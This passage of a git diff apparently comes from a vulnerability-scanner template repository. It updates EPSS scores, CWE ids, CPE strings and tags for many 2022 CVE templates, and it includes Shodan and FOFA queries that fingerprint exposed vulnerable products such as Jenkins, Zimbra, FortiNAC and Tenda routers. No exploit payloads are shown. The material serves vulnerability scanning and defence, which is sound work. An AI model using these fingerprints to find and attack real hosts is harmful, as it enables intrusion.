part: body
- - type: json # type of the extractor
+
+ - type: json
name: slug
internal: true
json:
- '.["values"] | .[] | .slug'
part: body
+
- type: regex
group: 1
regex:
diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml
index 0e3824817d..837a4b7639 100644
--- a/http/cves/2022/CVE-2022-36883.yaml
+++ b/http/cves/2022/CVE-2022-36883.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-36883
cwe-id: CWE-862
- epss-score: 0.01011
+ epss-score: 0.01083
cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:*
+ epss-percentile: 0.825
metadata:
max-request: 1
shodan-query: X-Jenkins
diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml
index 581f54f4f1..6990e10e4e 100644
--- a/http/cves/2022/CVE-2022-37042.yaml
+++ b/http/cves/2022/CVE-2022-37042.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-37042
- cwe-id: CWE-287
- epss-score: 0.97371
+ cwe-id: CWE-22
+ epss-score: 0.97489
cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*
+ epss-percentile: 0.99954
metadata:
max-request: 4
fofa-query: app="zimbra-邮件系统"
diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml
index eb0a549f68..887d7f8504 100644
--- a/http/cves/2022/CVE-2022-37153.yaml
+++ b/http/cves/2022/CVE-2022-37153.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:*
+ epss-percentile: 0.44709
metadata:
max-request: 1
shodan-query: http.html:"Artica"
diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml
index d5a0c714e1..ff723c273f 100644
--- a/http/cves/2022/CVE-2022-37190.yaml
+++ b/http/cves/2022/CVE-2022-37190.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-37190
cwe-id: CWE-732
- epss-score: 0.02513
+ epss-score: 0.01712
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86233
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml
index ae7e583b44..5cd541edac 100644
--- a/http/cves/2022/CVE-2022-37191.yaml
+++ b/http/cves/2022/CVE-2022-37191.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2022-37191
cwe-id: CWE-829
- epss-score: 0.39852
+ epss-score: 0.28873
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.96273
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml
index ae8e78f9b1..fb518cf237 100644
--- a/http/cves/2022/CVE-2022-37299.yaml
+++ b/http/cves/2022/CVE-2022-37299.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2022-37299
cwe-id: CWE-22
- epss-score: 0.00524
+ epss-score: 0.00519
cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.73813
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml
index bfce224721..5efa90291e 100644
--- a/http/cves/2022/CVE-2022-3768.yaml
+++ b/http/cves/2022/CVE-2022-3768.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-3768
cwe-id: CWE-89
- epss-score: 0.02248
+ epss-score: 0.02138
cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87828
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml
index f6eb713d4c..9c45e18369 100644
--- a/http/cves/2022/CVE-2022-3800.yaml
+++ b/http/cves/2022/CVE-2022-3800.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-3800
cwe-id: CWE-89,CWE-707
- epss-score: 0.06354
+ epss-score: 0.04587
cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:*
+ epss-percentile: 0.91474
metadata:
max-request: 1
vendor: ibax
diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml
index 37f7dd85fb..5d5cea807e 100644
--- a/http/cves/2022/CVE-2022-38295.yaml
+++ b/http/cves/2022/CVE-2022-38295.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-38295
cwe-id: CWE-79
- epss-score: 0.00086
+ epss-score: 0.00533
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.74162
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml
index 08dacfff28..cba603dc48 100644
--- a/http/cves/2022/CVE-2022-38296.yaml
+++ b/http/cves/2022/CVE-2022-38296.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-38296
cwe-id: CWE-434
- epss-score: 0.01076
+ epss-score: 0.01161
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.8311
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml
index 5845b25386..5c243655e9 100644
--- a/http/cves/2022/CVE-2022-38463.yaml
+++ b/http/cves/2022/CVE-2022-38463.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-38463
cwe-id: CWE-79
- epss-score: 0.00126
+ epss-score: 0.00122
cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:*
+ epss-percentile: 0.45824
metadata:
max-request: 1
shodan-query: http.title:"ServiceNow"
diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml
index b40d444c30..4552c75486 100644
--- a/http/cves/2022/CVE-2022-38467.yaml
+++ b/http/cves/2022/CVE-2022-38467.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml
index 7d0fe8e3ac..9e86c776ce 100644
--- a/http/cves/2022/CVE-2022-38553.yaml
+++ b/http/cves/2022/CVE-2022-38553.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-38553
cwe-id: CWE-79
- epss-score: 0.00084
+ epss-score: 0.001
cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40523
metadata:
max-request: 1
google-query: intext:"Study any topic, anytime"
diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml
index 324006f561..a3dc39d720 100644
--- a/http/cves/2022/CVE-2022-38637.yaml
+++ b/http/cves/2022/CVE-2022-38637.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-38637
cwe-id: CWE-89
- epss-score: 0.01174
+ epss-score: 0.01481
cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.8515
metadata:
max-request: 1
shodan-query: http.html:"Hospital Management System"
diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml
index d21f4235c8..1f6cd9cd95 100644
--- a/http/cves/2022/CVE-2022-38794.yaml
+++ b/http/cves/2022/CVE-2022-38794.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-38794
cwe-id: CWE-22
- epss-score: 0.00287
+ epss-score: 0.00318
cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.66648
metadata:
max-request: 1
vendor: zaver_project
diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml
index 8d6ad30b07..08cb37b985 100644
--- a/http/cves/2022/CVE-2022-38817.yaml
+++ b/http/cves/2022/CVE-2022-38817.yaml
@@ -15,8 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38817
- epss-score: 0.00512
+ cwe-id: CWE-306
+ epss-score: 0.0075
cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:*
+ epss-percentile: 0.78669
metadata:
max-request: 3
shodan-query: http.title:"Dapr Dashboard"
diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml
index 3fe0b3c42e..3c143a58cb 100644
--- a/http/cves/2022/CVE-2022-38870.yaml
+++ b/http/cves/2022/CVE-2022-38870.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-38870
cwe-id: CWE-306
- epss-score: 0.00327
+ epss-score: 0.00334
cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.67526
metadata:
max-request: 1
shodan-query: http.title:"free5GC Web Console"
diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml
index c24b663a8b..63c895855b 100644
--- a/http/cves/2022/CVE-2022-3908.yaml
+++ b/http/cves/2022/CVE-2022-3908.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-3908
cwe-id: CWE-79
- epss-score: 0.00064
+ epss-score: 0.00071
cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml
index 61f5b6ca4d..b465fbedd1 100644
--- a/http/cves/2022/CVE-2022-39195.yaml
+++ b/http/cves/2022/CVE-2022-39195.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00125
cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
+ epss-percentile: 0.46238
metadata:
max-request: 2
shodan-query: http.html:"LISTSERV"
diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml
index 1621350e6f..28f0a14b6c 100644
--- a/http/cves/2022/CVE-2022-3933.yaml
+++ b/http/cves/2022/CVE-2022-3933.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-3933
cwe-id: CWE-79
- epss-score: 0.0007
+ epss-score: 0.00077
cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.31826
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml
index c659733ae6..395e187efb 100644
--- a/http/cves/2022/CVE-2022-3934.yaml
+++ b/http/cves/2022/CVE-2022-3934.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-3934
cwe-id: CWE-79
- epss-score: 0.0007
+ epss-score: 0.00077
cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.31826
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml
index 726407c97b..2f12dee3f9 100644
--- a/http/cves/2022/CVE-2022-3980.yaml
+++ b/http/cves/2022/CVE-2022-3980.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-3980
cwe-id: CWE-611
- epss-score: 0.33654
+ epss-score: 0.75202
cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97737
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml
index 75913ac144..9b049fb9eb 100644
--- a/http/cves/2022/CVE-2022-3982.yaml
+++ b/http/cves/2022/CVE-2022-3982.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-3982
cwe-id: CWE-434
- epss-score: 0.96022
+ epss-score: 0.40713
cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96796
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml
index 3a5d68d57e..e373582191 100644
--- a/http/cves/2022/CVE-2022-39952.yaml
+++ b/http/cves/2022/CVE-2022-39952.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-39952
- cwe-id: CWE-610
- epss-score: 0.96372
+ cwe-id: CWE-668
+ epss-score: 0.9679
cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99533
metadata:
max-request: 1
shodan-query: title:"FortiNAC"
diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml
index 1c5326533d..2f8c487390 100644
--- a/http/cves/2022/CVE-2022-39960.yaml
+++ b/http/cves/2022/CVE-2022-39960.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-39960
cwe-id: CWE-862
- epss-score: 0.29823
+ epss-score: 0.24986
cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*
+ epss-percentile: 0.96046
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml
index 0e3804f089..646caeb040 100644
--- a/http/cves/2022/CVE-2022-39986.yaml
+++ b/http/cves/2022/CVE-2022-39986.yaml
@@ -10,16 +10,23 @@ info:
- https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39986
- https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
+ - http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
+ - https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-39986
cwe-id: CWE-77
+ epss-score: 0.60136
+ cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97326
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1465760059
verified: true
- tags: cve,cve2020,raspap,rce
+ vendor: raspap
+ product: raspap
+ tags: packetstorm,cve,cve2020,raspap,rce
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml
index b58988ea58..54883a9c30 100644
--- a/http/cves/2022/CVE-2022-40022.yaml
+++ b/http/cves/2022/CVE-2022-40022.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-40022
cwe-id: CWE-77
- epss-score: 0.75757
+ epss-score: 0.70919
cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.9761
metadata:
max-request: 1
shodan-query: html:"Symmetricom SyncServer"
diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml
index 2e3e8626e7..30c52a8b5f 100644
--- a/http/cves/2022/CVE-2022-40083.yaml
+++ b/http/cves/2022/CVE-2022-40083.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.6
cve-id: CVE-2022-40083
cwe-id: CWE-601
- epss-score: 0.01114
+ epss-score: 0.01662
cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86042
metadata:
max-request: 1
vendor: labstack
diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml
index d9350fba4b..66d8ceffff 100644
--- a/http/cves/2022/CVE-2022-40127.yaml
+++ b/http/cves/2022/CVE-2022-40127.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-40127
cwe-id: CWE-94
- epss-score: 0.19379
+ epss-score: 0.17166
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95397
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml
index 159d9db68f..b9deab4006 100644
--- a/http/cves/2022/CVE-2022-40359.yaml
+++ b/http/cves/2022/CVE-2022-40359.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-40359
cwe-id: CWE-79
- epss-score: 0.00071
+ epss-score: 0.00078
cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:*
+ epss-percentile: 0.32136
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml
index 873b397a08..59185c4c54 100644
--- a/http/cves/2022/CVE-2022-4050.yaml
+++ b/http/cves/2022/CVE-2022-4050.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-4050
cwe-id: CWE-89
- epss-score: 0.16485
+ epss-score: 0.31266
cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96404
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml
index 802840a4a5..a60bd5394e 100644
--- a/http/cves/2022/CVE-2022-4057.yaml
+++ b/http/cves/2022/CVE-2022-4057.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-4057
- cwe-id: CWE-425,CWE-200
+ cwe-id: CWE-425
epss-score: 0.00177
cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54176
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml
index ddc373e915..791b863222 100644
--- a/http/cves/2022/CVE-2022-4060.yaml
+++ b/http/cves/2022/CVE-2022-4060.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-94
epss-score: 0.05043
cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91883
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml
index a532f7e648..9e200b19ac 100644
--- a/http/cves/2022/CVE-2022-4063.yaml
+++ b/http/cves/2022/CVE-2022-4063.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-4063
cwe-id: CWE-22
- epss-score: 0.00727
+ epss-score: 0.00819
cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.79674
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml
index 3fed51b292..0db36c1329 100644
--- a/http/cves/2022/CVE-2022-40684.yaml
+++ b/http/cves/2022/CVE-2022-40684.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40684
- cwe-id: CWE-306
- epss-score: 0.96776
+ cwe-id: CWE-287
+ epss-score: 0.96782
cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9953
metadata:
max-request: 2
vendor: fortinet
diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml
index 86dc78ac57..cd34457517 100644
--- a/http/cves/2022/CVE-2022-40734.yaml
+++ b/http/cves/2022/CVE-2022-40734.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2022-40734
cwe-id: CWE-22
- epss-score: 0.01294
+ epss-score: 0.00783
cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79184
metadata:
max-request: 2
shodan-query: http.html:"Laravel Filemanager"
diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml
index fef7fc5688..4353ea6ff2 100644
--- a/http/cves/2022/CVE-2022-40843.yaml
+++ b/http/cves/2022/CVE-2022-40843.yaml
@@ -3,19 +3,24 @@ id: CVE-2022-40843
info:
name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
author: gy741
- severity: critical
+ severity: medium
description: |
The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
reference:
- https://boschko.ca/tenda_ac1200_router
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
- cvss-score: 9.9
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
cve-id: CVE-2022-40843
cwe-id: CWE-287
+ epss-score: 0.5155
+ cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:*
+ epss-percentile: 0.97125
metadata:
max-request: 1
+ vendor: tenda
+ product: w15e_firmware
tags: cve,cve2022,tenda,auth-bypass,router,iot
http:
diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml
index 8c145e2552..b031d5b251 100644
--- a/http/cves/2022/CVE-2022-40879.yaml
+++ b/http/cves/2022/CVE-2022-40879.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-40879
cwe-id: CWE-79
- epss-score: 0.0012
+ epss-score: 0.02057
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.87582
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml
index f1d5f5452c..e86ddbd468 100644
--- a/http/cves/2022/CVE-2022-40881.yaml
+++ b/http/cves/2022/CVE-2022-40881.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-40881
cwe-id: CWE-77
- epss-score: 0.95017
+ epss-score: 0.94859
cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:*
+ epss-percentile: 0.98977
metadata:
max-request: 1
shodan-query: http.favicon.hash:"-244067125"
diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml
index 6869cd0345..4539b8fe6c 100644
--- a/http/cves/2022/CVE-2022-4117.yaml
+++ b/http/cves/2022/CVE-2022-4117.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-4117
cwe-id: CWE-89
- epss-score: 0.04839
+ epss-score: 0.12065
cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94628
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml
index 9615b67c89..b0fafeced2 100644
--- a/http/cves/2022/CVE-2022-4140.yaml
+++ b/http/cves/2022/CVE-2022-4140.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
- epss-score: 0.01568
+ epss-score: 0.00516
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.73753
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml
index e22adc0138..fe6314c609 100644
--- a/http/cves/2022/CVE-2022-41441.yaml
+++ b/http/cves/2022/CVE-2022-41441.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-41441
cwe-id: CWE-79
- epss-score: 0.00109
+ epss-score: 0.00104
cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:*
+ epss-percentile: 0.41863
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml
index ec806e4f82..fce42916a7 100644
--- a/http/cves/2022/CVE-2022-41473.yaml
+++ b/http/cves/2022/CVE-2022-41473.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-41473
cwe-id: CWE-79
- epss-score: 0.00085
+ epss-score: 0.0332
cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.9008
metadata:
max-request: 1
shodan-query: http.html:"RPCMS"
diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml
index fbd754f80d..a8b3a2dfb8 100644
--- a/http/cves/2022/CVE-2022-41840.yaml
+++ b/http/cves/2022/CVE-2022-41840.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-41840
cwe-id: CWE-22
- epss-score: 0.00308
+ epss-score: 0.00635
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.76449
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml
index 1422bf10e8..c1f0e4ac37 100644
--- a/http/cves/2022/CVE-2022-42094.yaml
+++ b/http/cves/2022/CVE-2022-42094.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00564
cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:*
+ epss-percentile: 0.74906
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml
index 9fc142162c..65e69c32b5 100644
--- a/http/cves/2022/CVE-2022-42095.yaml
+++ b/http/cves/2022/CVE-2022-42095.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00431
cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*
+ epss-percentile: 0.71305
metadata:
max-request: 5
verified: true
diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml
index 1ff8359e9b..8bf7a597be 100644
--- a/http/cves/2022/CVE-2022-42096.yaml
+++ b/http/cves/2022/CVE-2022-42096.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00569
cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*
+ epss-percentile: 0.74992
metadata:
max-request: 5
verified: true
diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml
index a98f31e05f..1f4e1e4294 100644
--- a/http/cves/2022/CVE-2022-42233.yaml
+++ b/http/cves/2022/CVE-2022-42233.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-42233
cwe-id: CWE-287
- epss-score: 0.91121
+ epss-score: 0.89148
cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:*
+ epss-percentile: 0.98301
metadata:
max-request: 1
fofa-query: product=="Tenda-11N-Wireless-AP"
diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml
index 80789434ea..42fbb10cdb 100644
--- a/http/cves/2022/CVE-2022-4260.yaml
+++ b/http/cves/2022/CVE-2022-4260.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2022-4260
cwe-id: CWE-79
- epss-score: 0.00071
+ epss-score: 0.00078
